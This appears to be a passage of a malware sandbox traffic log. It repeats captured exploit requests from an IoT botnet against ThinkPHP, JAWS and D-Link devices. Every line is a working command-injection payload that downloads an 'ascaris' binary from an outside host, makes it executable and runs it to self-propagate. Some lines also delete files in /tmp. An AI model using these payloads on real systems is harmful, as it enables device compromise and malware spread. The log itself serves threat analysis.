            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
